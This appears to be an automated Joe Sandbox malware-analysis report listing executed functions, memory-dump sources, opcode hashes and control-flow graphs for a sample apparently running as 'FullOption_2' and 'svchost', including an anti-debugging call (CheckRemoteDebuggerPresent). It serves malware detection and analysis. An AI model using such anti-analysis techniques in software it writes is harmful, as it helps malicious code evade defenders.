                                                      Function 00007FFB4AD20E71 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed91c9e8e20836a969844e7db30844063fbd10dedc802a1918f333baf2b42a97
                                                      • Instruction ID: 36393927e1c646edf6f650d7dd37fe644c3d02bee83faebf6a366cfdcd0f0eaf
                                                      • Opcode Fuzzy Hash: ed91c9e8e20836a969844e7db30844063fbd10dedc802a1918f333baf2b42a97
                                                      • Instruction Fuzzy Hash: 03014961B1EA494FE345EF3CD8912A833D1FF88310B5405B9D949C3392DE28EC428782
                                                      Function 00007FFB4AD204A8 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ea0490caaee4a155719ba0dfb316c2a5ac1475bc98c632c5a2bcfeab0f8b56c
                                                      • Instruction ID: 8d183ca80f45b1a3826ed142b1e8900817352cb2174c5dcb01dcef942f164a82
                                                      • Opcode Fuzzy Hash: 3ea0490caaee4a155719ba0dfb316c2a5ac1475bc98c632c5a2bcfeab0f8b56c
                                                      • Instruction Fuzzy Hash: F3F02D6171E5595BE755FA3CD44167D73D5EF88314F2005B5D94DC3382CD28EC418781
                                                      Function 00007FFB4AD204B0 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0092edfd08ee9cf97b8e6a01f5ec2a27ef0ec3ec80b0a35ea2fbfe54cf6af09f
                                                      • Instruction ID: 21eba6a651ab50d668946c58bb775999f7d9f0bde80549928fd5456f0724a22c
                                                      • Opcode Fuzzy Hash: 0092edfd08ee9cf97b8e6a01f5ec2a27ef0ec3ec80b0a35ea2fbfe54cf6af09f
                                                      • Instruction Fuzzy Hash: C1F0F47071D9195BE655FB3CD89166D33D6FB88310B600579E94EC3381DE28A8428B82
                                                      Function 00007FFB4AD20F3F Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1677308540.00007FFB4AD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ffb4ad20000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d09b687487cf446a8b6a03784f488a7e6bf0fd4d7592c3ee46a4011dc4f6edc9
                                                      • Instruction ID: 75dd1e801e27a60aa8a3755882a04b22cda7f321e37dba90a333e474c02e5bd7
                                                      • Opcode Fuzzy Hash: d09b687487cf446a8b6a03784f488a7e6bf0fd4d7592c3ee46a4011dc4f6edc9
                                                      • Instruction Fuzzy Hash: CDE08692B5D9090BF789797C64662F8A7C6DB88210F510079E00EC2686DC099C828285

                                                      Executed Functions

                                                      Function 00007FFB4AD11118 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Ky]I
                                                      • API String ID: 0-912558546
                                                      • Opcode ID: 53da3c2d20cef4a569be093f507033a042dd615469615b62e0ea85a3c1c5b599
                                                      • Instruction ID: 116883ffbdeec4cc67193612c6858842be66faa2fb4ba4ca927f6fbf19138beb
                                                      • Opcode Fuzzy Hash: 53da3c2d20cef4a569be093f507033a042dd615469615b62e0ea85a3c1c5b599
                                                      • Instruction Fuzzy Hash: 5D31D5A2B1E9890FE785FF788859279AFE6EF99201B1400BEE44DC3297DD18EC458345
                                                      Function 00007FFB4AD10D80 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H
                                                      • API String ID: 0-2852464175
                                                      • Opcode ID: eadcee186f59f31e35db8e8d9d30bb01908da7e39350be3d2b5d8ad2471000f5
                                                      • Instruction ID: 2a25faef1756b27edeca5a3d83c275a3dd41a754396df535e3bb195474fd1c86
                                                      • Opcode Fuzzy Hash: eadcee186f59f31e35db8e8d9d30bb01908da7e39350be3d2b5d8ad2471000f5
                                                      • Instruction Fuzzy Hash: 283167A288E3C25FD3036B709C764A17FB0DE4722070A44EBD8C4CB5A3D51C6A9AC762
                                                      Function 00007FFB4AD11177 Relevance: .4, Instructions: 365COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 585a052818dfcb5f10c9b5160823d5797aa2dd006a6390210332cd3a05dd46bd
                                                      • Instruction ID: bccc807c97b0536210c25c6ef71801d00a950eabed0ce09a0ae5587e3325d6f3
                                                      • Opcode Fuzzy Hash: 585a052818dfcb5f10c9b5160823d5797aa2dd006a6390210332cd3a05dd46bd
                                                      • Instruction Fuzzy Hash: 7021E971B1DA8C4FE786FB7888992B87BE1EF99301B0400BBE44DC3693DE149C058741
                                                      Function 00007FFB4AD109F7 Relevance: .2, Instructions: 220COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636e889ce01dbbc3784fadb94d0f922b3e70a047dbcc132bf2eb1c1c669df5df
                                                      • Instruction ID: 5c466b3b03cd952bd8c29790034110384d76cc26170276cd19984809239002f1
                                                      • Opcode Fuzzy Hash: 636e889ce01dbbc3784fadb94d0f922b3e70a047dbcc132bf2eb1c1c669df5df
                                                      • Instruction Fuzzy Hash: 94713070A189198FEB55FF78C598BAD7BE2FF58314F2401A9E01AD31D1CF3498428B40
                                                      Function 00007FFB4AD10498 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d466adf621421d70d2cc1800c7f8081566d91ab3bd6b1aa3cc01e39fcad8ac04
                                                      • Instruction ID: 93b597d358d9c966e9984b93271ce554afc102a47c172b7fca67c8b83e4c9087
                                                      • Opcode Fuzzy Hash: d466adf621421d70d2cc1800c7f8081566d91ab3bd6b1aa3cc01e39fcad8ac04
                                                      • Instruction Fuzzy Hash: 0E21DC71B0990C5FEB84FA68C8996B9B7E2EF98301B04007AE80EC3693DE24AC058745
                                                      Function 00007FFB4AD10951 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbe3906b51adda66c8000a10c4a25285cc6efc4c9174cff59cb3a1aa681dff87
                                                      • Instruction ID: 5a0cc8b7edf22f27d1e828665513d10ab46068b88730d68d74edb23229a4df48
                                                      • Opcode Fuzzy Hash: cbe3906b51adda66c8000a10c4a25285cc6efc4c9174cff59cb3a1aa681dff87
                                                      • Instruction Fuzzy Hash: C21120B0D087499FEB04EF68C4496EEBFF0EF48310F1441AAD040E7282DB38A9428B51
                                                      Function 00007FFB4AD10E71 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83bd946c56215da4d2d94a80744e198af92b25133c29a018efeaece8dc205a55
                                                      • Instruction ID: 9a178b58887d5ae2eb857f32eabb34bf9324e025f2e5b24a2184489570282f2b
                                                      • Opcode Fuzzy Hash: 83bd946c56215da4d2d94a80744e198af92b25133c29a018efeaece8dc205a55
                                                      • Instruction Fuzzy Hash: 0F012670B1DA994BE745FF38D4916B937D1EF8C310B5404BAD949C3382DE28E8428785
                                                      Function 00007FFB4AD104A8 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34a470af8ee00b9f19752aa4d7b34e4c09ac148a6542f7d65215cfc6f655c56
                                                      • Instruction ID: a97d24791777d0cdca2f4e22584f29055400a7d8c2952a6594df3cb8d3a45196
                                                      • Opcode Fuzzy Hash: e34a470af8ee00b9f19752aa4d7b34e4c09ac148a6542f7d65215cfc6f655c56
                                                      • Instruction Fuzzy Hash: 59F02870B1EA5A4BE755FA3CE441ABA73D5EF8C310B240579E94EC3281CD28E8424784
                                                      Function 00007FFB4AD104B0 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c785050f2fe2fe918c7f5b45f07efa4436c0a776ea2a66be0dff5d8f275cce1a
                                                      • Instruction ID: 406b8153e642430f97ba78265867e5c4628cd204396b8171512215a1fc6a0d2b
                                                      • Opcode Fuzzy Hash: c785050f2fe2fe918c7f5b45f07efa4436c0a776ea2a66be0dff5d8f275cce1a
                                                      • Instruction Fuzzy Hash: 2AF0F43071DA594BE754FB3CD451A7E33D6EB8C300B600479E94EC3380DE28A8424785
                                                      Function 00007FFB4AD10F3F Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1683717269.00007FFB4AD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffb4ad10000_FullOption_2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 409be2cf904390cac38eb40ca62efd346f8f76005d176bbaad7ed7b618dc41fd
                                                      • Instruction ID: aebb951cc369456ccc6726f018984eb498d1be14e60319370c1291660675d2c9
                                                      • Opcode Fuzzy Hash: 409be2cf904390cac38eb40ca62efd346f8f76005d176bbaad7ed7b618dc41fd
                                                      • Instruction Fuzzy Hash: D3E08691B5D9090BF79979BC64A72F86BC6DB88210F514179E00EC26C7EC09DC824285

                                                      Execution Graph

                                                      Execution Coverage:25.8%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:33.3%
                                                      Total number of Nodes:9
                                                      Total number of Limit Nodes:0

                                                      Executed Functions

                                                      Function 00007FFB4AD3E5B9 Relevance: 2.5, Strings: 1, Instructions: 1215COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 8 7ffb4ad3e5b9-7ffb4ad3e5f3 10 7ffb4ad3e63d-7ffb4ad3e645 8->10 11 7ffb4ad3e5f5-7ffb4ad3e600 call 7ffb4ad30a40 8->11 13 7ffb4ad3e6bb 10->13 14 7ffb4ad3e647-7ffb4ad3e664 10->14 15 7ffb4ad3e605-7ffb4ad3e63c 11->15 17 7ffb4ad3e6c0-7ffb4ad3e6d5 13->17 14->17 18 7ffb4ad3e666-7ffb4ad3e6b6 call 7ffb4ad3c250 14->18 15->10 21 7ffb4ad3e6f3-7ffb4ad3e708 17->21 22 7ffb4ad3e6d7-7ffb4ad3e6ee call 7ffb4ad31228 call 7ffb4ad30a50 17->22 45 7ffb4ad3f2fb-7ffb4ad3f309 18->45 31 7ffb4ad3e73f-7ffb4ad3e754 21->31 32 7ffb4ad3e70a-7ffb4ad3e73a call 7ffb4ad31228 21->32 22->45 40 7ffb4ad3e756-7ffb4ad3e762 call 7ffb4ad3bdd8 31->40 41 7ffb4ad3e767-7ffb4ad3e77c 31->41 32->45 40->45 50 7ffb4ad3e77e-7ffb4ad3e781 41->50 51 7ffb4ad3e7c2-7ffb4ad3e7d7 41->51 50->13 52 7ffb4ad3e787-7ffb4ad3e792 50->52 56 7ffb4ad3e7d9-7ffb4ad3e7dc 51->56 57 7ffb4ad3e818-7ffb4ad3e82d 51->57 52->13 53 7ffb4ad3e798-7ffb4ad3e7bd call 7ffb4ad30a28 call 7ffb4ad3bdd8 52->53 53->45 56->13 59 7ffb4ad3e7e2-7ffb4ad3e7ed 56->59 64 7ffb4ad3e82f-7ffb4ad3e832 57->64 65 7ffb4ad3e85a-7ffb4ad3e86f 57->65 59->13 62 7ffb4ad3e7f3-7ffb4ad3e813 call 7ffb4ad30a28 call 7ffb4ad3ad60 59->62 62->45 64->13 67 7ffb4ad3e838-7ffb4ad3e855 call 7ffb4ad30a28 call 7ffb4ad3ad68 64->67 73 7ffb4ad3e875-7ffb4ad3e8c1 call 7ffb4ad309b0 65->73 74 7ffb4ad3e947-7ffb4ad3e95c 65->74 67->45 73->13 108 7ffb4ad3e8c7-7ffb4ad3e8ff call 7ffb4ad37700 73->108 82 7ffb4ad3e95e-7ffb4ad3e961 74->82 83 7ffb4ad3e97b-7ffb4ad3e990 74->83 82->13 85 7ffb4ad3e967-7ffb4ad3e976 call 7ffb4ad3ad40 82->85 92 7ffb4ad3e9b2-7ffb4ad3e9c7 83->92 93 7ffb4ad3e992-7ffb4ad3e995 83->93 85->45 99 7ffb4ad3e9c9-7ffb4ad3e9e2 92->99 100 7ffb4ad3e9e7-7ffb4ad3e9fc 92->100 93->13 94 7ffb4ad3e99b-7ffb4ad3e9ad call 7ffb4ad3ad40 93->94 94->45 99->45 105 7ffb4ad3e9fe-7ffb4ad3ea17 100->105 106 7ffb4ad3ea1c-7ffb4ad3ea31 100->106 105->45 112 7ffb4ad3ea51-7ffb4ad3ea66 106->112 113 7ffb4ad3ea33-7ffb4ad3ea4c 106->113 108->13 125 7ffb4ad3e905-7ffb4ad3e942 call 7ffb4ad3be08 108->125 117 7ffb4ad3ea8f-7ffb4ad3eaa4 112->117 118 7ffb4ad3ea68-7ffb4ad3ea6b 112->118 113->45 126 7ffb4ad3eb44-7ffb4ad3eb59 117->126 127 7ffb4ad3eaaa-7ffb4ad3eb22 117->127 118->13 120 7ffb4ad3ea71-7ffb4ad3ea8a 118->120 120->45 125->45 133 7ffb4ad3eb5b-7ffb4ad3eb6c 126->133 134 7ffb4ad3eb71-7ffb4ad3eb86 126->134 127->13 155 7ffb4ad3eb28-7ffb4ad3eb3f 127->155 133->45 140 7ffb4ad3eb8c-7ffb4ad3ec04 134->140 141 7ffb4ad3ec26-7ffb4ad3ec3b 134->141 140->13 174 7ffb4ad3ec0a-7ffb4ad3ec21 140->174 148 7ffb4ad3ec3d-7ffb4ad3ec4e 141->148 149 7ffb4ad3ec53-7ffb4ad3ec68 141->149 148->45 157 7ffb4ad3ec9a-7ffb4ad3ecaf 149->157 158 7ffb4ad3ec6a-7ffb4ad3ec95 call 7ffb4ad30d40 call 7ffb4ad3c250 149->158 155->45 164 7ffb4ad3ed8c-7ffb4ad3eda1 157->164 165 7ffb4ad3ecb5-7ffb4ad3ed87 call 7ffb4ad30d40 call 7ffb4ad3c250 157->165 158->45 172 7ffb4ad3ee68-7ffb4ad3ee7d 164->172 173 7ffb4ad3eda7-7ffb4ad3edaa 164->173 165->45 183 7ffb4ad3ee91-7ffb4ad3eea6 172->183 184 7ffb4ad3ee7f-7ffb4ad3ee8c call 7ffb4ad3c250 172->184 176 7ffb4ad3ee5d-7ffb4ad3ee62 173->176 177 7ffb4ad3edb0-7ffb4ad3edbb 173->177 174->45 189 7ffb4ad3ee63 176->189 177->176 180 7ffb4ad3edc1-7ffb4ad3ee5b call 7ffb4ad30d40 call 7ffb4ad3c250 177->180 180->189 193 7ffb4ad3ef1d-7ffb4ad3ef32 183->193 194 7ffb4ad3eea8-7ffb4ad3eeb9 183->194 184->45 189->45 202 7ffb4ad3ef72-7ffb4ad3ef87 193->202 203 7ffb4ad3ef34-7ffb4ad3ef37 193->203 194->13 200 7ffb4ad3eebf-7ffb4ad3eecf call 7ffb4ad30a20 194->200 215 7ffb4ad3eefb-7ffb4ad3ef18 call 7ffb4ad30a20 call 7ffb4ad30a28 call 7ffb4ad3ad18 200->215 216 7ffb4ad3eed1-7ffb4ad3eef6 call 7ffb4ad3c250 200->216 213 7ffb4ad3efcd-7ffb4ad3efe2 202->213 214 7ffb4ad3ef89-7ffb4ad3efc8 call 7ffb4ad38f50 call 7ffb4ad3a150 call 7ffb4ad3ad20 202->214 203->13 206 7ffb4ad3ef3d-7ffb4ad3ef6d call 7ffb4ad30a18 call 7ffb4ad30a28 call 7ffb4ad3ad18 203->206 206->45 231 7ffb4ad3f082-7ffb4ad3f097 213->231 232 7ffb4ad3efe8-7ffb4ad3f07d call 7ffb4ad30d40 call 7ffb4ad3c250 213->232 214->45 215->45 216->45 231->45 250 7ffb4ad3f09d-7ffb4ad3f0a4 231->250 232->45 251 7ffb4ad3f0a6-7ffb4ad3f0b0 call 7ffb4ad3be18 250->251 252 7ffb4ad3f0b7-7ffb4ad3f1d1 call 7ffb4ad3be28 call 7ffb4ad3be38 call 7ffb4ad3be48 call 7ffb4ad3be58 call 7ffb4ad39fe0 call 7ffb4ad3be68 call 7ffb4ad3be38 call 7ffb4ad3be48 250->252 251->252 300 7ffb4ad3f242-7ffb4ad3f251 252->300 301 7ffb4ad3f1d3-7ffb4ad3f1d7 252->301 303 7ffb4ad3f258-7ffb4ad3f2fa call 7ffb4ad30d40 call 7ffb4ad30a30 call 7ffb4ad3c250 300->303 302 7ffb4ad3f1d9-7ffb4ad3f22a call 7ffb4ad3be78 call 7ffb4ad3be88 301->302 301->303 313 7ffb4ad3f22f-7ffb4ad3f238 302->313 303->45 313->300
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 0dbc6b0834a6a77b16339ceac6b4f9e72b6ae17a0791763723d983891cd6ecf1
                                                      • Instruction ID: 737e44788d59dfbc05cb8b68bc930be28f2b8556ca4f034c3dcf9d08c4354139
                                                      • Opcode Fuzzy Hash: 0dbc6b0834a6a77b16339ceac6b4f9e72b6ae17a0791763723d983891cd6ecf1
                                                      • Instruction Fuzzy Hash: B4827FB4B1C90A8BEB99FF38C55667972D6FF98300F6045F9D40EC76C6DE28A8428741
                                                      Function 00007FFB4AD37A81 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 350 7ffb4ad37a81-7ffb4ad37b3d CheckRemoteDebuggerPresent 353 7ffb4ad37b3f 350->353 354 7ffb4ad37b45-7ffb4ad37b88 350->354 353->354
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID: CheckDebuggerPresentRemote
                                                      • String ID:
                                                      • API String ID: 3662101638-0
                                                      • Opcode ID: 5f28065202b093782de2986388e9142f543f71ab39178958734d98c36ea7eb80
                                                      • Instruction ID: 377c69178c57b1373f24846067739c88c358b397efc8669d6e5294835ea4c852
                                                      • Opcode Fuzzy Hash: 5f28065202b093782de2986388e9142f543f71ab39178958734d98c36ea7eb80
                                                      • Instruction Fuzzy Hash: 4131227190871C8FCB58DF58C88A7E97BE0FF65321F0542AAD489D7252CB34A856CB91
                                                      Function 00007FFB4AD31290 Relevance: .7, Instructions: 748COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 511 7ffb4ad31290-7ffb4ad3170b 514 7ffb4ad3170d-7ffb4ad31715 511->514 515 7ffb4ad3177c-7ffb4ad31780 511->515 516 7ffb4ad3178c-7ffb4ad31885 call 7ffb4ad30638 * 6 call 7ffb4ad30a48 515->516 517 7ffb4ad31787 call 7ffb4ad30638 515->517 547 7ffb4ad3188f-7ffb4ad31906 call 7ffb4ad304b8 call 7ffb4ad304b0 call 7ffb4ad30358 call 7ffb4ad30368 516->547 548 7ffb4ad31887-7ffb4ad3188e 516->548 517->516 563 7ffb4ad31919-7ffb4ad31929 547->563 564 7ffb4ad31908-7ffb4ad31912 547->564 548->547 567 7ffb4ad3192b-7ffb4ad3194a call 7ffb4ad30358 563->567 568 7ffb4ad31951-7ffb4ad31971 563->568 564->563 567->568 574 7ffb4ad31982-7ffb4ad319e6 call 7ffb4ad31038 568->574 575 7ffb4ad31973-7ffb4ad3197d call 7ffb4ad30378 568->575 586 7ffb4ad319ec-7ffb4ad31a81 574->586 587 7ffb4ad31a86-7ffb4ad31b14 574->587 575->574 606 7ffb4ad31b1b-7ffb4ad31c59 call 7ffb4ad30870 call 7ffb4ad31288 call 7ffb4ad30388 call 7ffb4ad30398 586->606 587->606 630 7ffb4ad31c5b-7ffb4ad31c8e 606->630 631 7ffb4ad31ca7-7ffb4ad31cda 606->631 630->631 638 7ffb4ad31c90-7ffb4ad31c9d 630->638 641 7ffb4ad31cdc-7ffb4ad31cfd 631->641 642 7ffb4ad31cff-7ffb4ad31d2f 631->642 638->631 643 7ffb4ad31c9f-7ffb4ad31ca5 638->643 644 7ffb4ad31d37-7ffb4ad31d6e 641->644 642->644 643->631 651 7ffb4ad31d70-7ffb4ad31d91 644->651 652 7ffb4ad31d93-7ffb4ad31dc3 644->652 653 7ffb4ad31dcb-7ffb4ad31ead call 7ffb4ad303a8 call 7ffb4ad309e8 call 7ffb4ad31038 651->653 652->653 672 7ffb4ad31eaf call 7ffb4ad31220 653->672 673 7ffb4ad31eb4-7ffb4ad31f4d 653->673 672->673
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2e7f17b3769e868dbb2fe5e17cb73ee7e95c3cafc0bdcad2a7029a79bd2aa13
                                                      • Instruction ID: 101ea861fc140fbf0c0a4e10f7cd0e4fc66eaa5db46b0995306f831a1d3d8b7f
                                                      • Opcode Fuzzy Hash: a2e7f17b3769e868dbb2fe5e17cb73ee7e95c3cafc0bdcad2a7029a79bd2aa13
                                                      • Instruction Fuzzy Hash: C432C2A1B2DA4A5BEB99FF38C45927977D6FF98300F5405F9E44EC3286CD28AC428741
                                                      Function 00007FFB4AD31719 Relevance: .7, Instructions: 695COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2929867773.00007FFB4AD30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffb4ad30000_svchost.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0c88a054457e2cb7d88289a852f51a8711b37a55894c3c3388ec4c2c6e3baaa
                                                      • Instruction ID: 3657272fee50460df4c1fac65e2b31d70e9f4ca33ca44bceda58b3ad29870d17
                                                      • Opcode Fuzzy Hash: f0c88a054457e2cb7d88289a852f51a8711b37a55894c3c3388ec4c2c6e3baaa
                                                      • Instruction Fuzzy Hash: 7222C3A1B2DA4A5FEB95FF38C4692B977D6FF98300F5405F9E44DC3286CD28A8428741
                                                      Function 00007FFB4AD360C6 Relevance: .5, Instructions: 474COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 982 7ffb4ad360c6-7ffb4ad360d3 983 7ffb4ad360de-7ffb4ad361a7 982->983 984 7ffb4ad360d5-7ffb4ad360dd 982->984 987 7ffb4ad36213 983->987 988 7ffb4ad361a9-7ffb4ad361b2 983->988 984->983 990 7ffb4ad36215-7ffb4ad3623a 987->990 988->987 989 7ffb4ad361b4-7ffb4ad361c0 988->989 991 7ffb4ad361c2-7ffb4ad361d4 989->991 992 7ffb4ad361f9-7ffb4ad36211 989->992 997 7ffb4ad3623c-7ffb4ad36245 990->997 998 7ffb4ad362a6 990->998 993 7ffb4ad361d6 991->993 994 7ffb4ad361d8-7ffb4ad361eb 991->994 992->990 993->994 994->994 996 7ffb4ad361ed-7ffb4ad361f5 994->996 996->992 997->998 1000 7ffb4ad36247-7ffb4ad36253 997->1000 999 7ffb4ad362a8-7ffb4ad36350 998->999 1011 7ffb4ad363be 999->1011 1012 7ffb4ad36352-7ffb4ad3635c 999->1012 1001 7ffb4ad3628c-7ffb4ad362a4 1000->1001 1002 7ffb4ad36255-7ffb4ad36267 1000->1002 1001->999 1003 7ffb4ad3626b-7ffb4ad3627e 1002->1003 1004 7ffb4ad36269 1002->1004 1003->1003 1006 7ffb4ad36280-7ffb4ad36288 1003->1006 1004->1003 1006->1001 1013 7ffb4ad363c0-7ffb4ad363e9 1011->1013 1012->1011 1014 7ffb4ad3635e-7ffb4ad3636b 1012->1014 1021 7ffb4ad363eb-7ffb4ad363f6 1013->1021 1022 7ffb4ad36453 1013->1022 1015 7ffb4ad3636d-7ffb4ad3637f 1014->1015 1016 7ffb4ad363a4-7ffb4ad363bc 1014->1016 1017 7ffb4ad36381 1015->1017 1018 7ffb4ad36383-7ffb4ad36396 1015->1018 1016->1013 1017->1018 1018->1018 1020 7ffb4ad36398-7ffb4ad363a0 1018->1020 1020->1016 1021->1022 1024 7ffb4ad363f8-7ffb4ad36406 1021->1024 1023 7ffb4ad36455-7ffb4ad364e6 1022->1023 1032 7ffb4ad364ec-7ffb4ad364fb 1023->1032 1025 7ffb4ad3643f-7ffb4ad36451 1024->1025 1026 7ffb4ad36408-7ffb4ad3641a 1024->1026 1025->1023 1028 7ffb4ad3641e-7ffb4ad36431 1026->1028 1029 7ffb4ad3641c 1026->1029 1028->1028 1030 7ffb4ad36433-7ffb4ad3643b 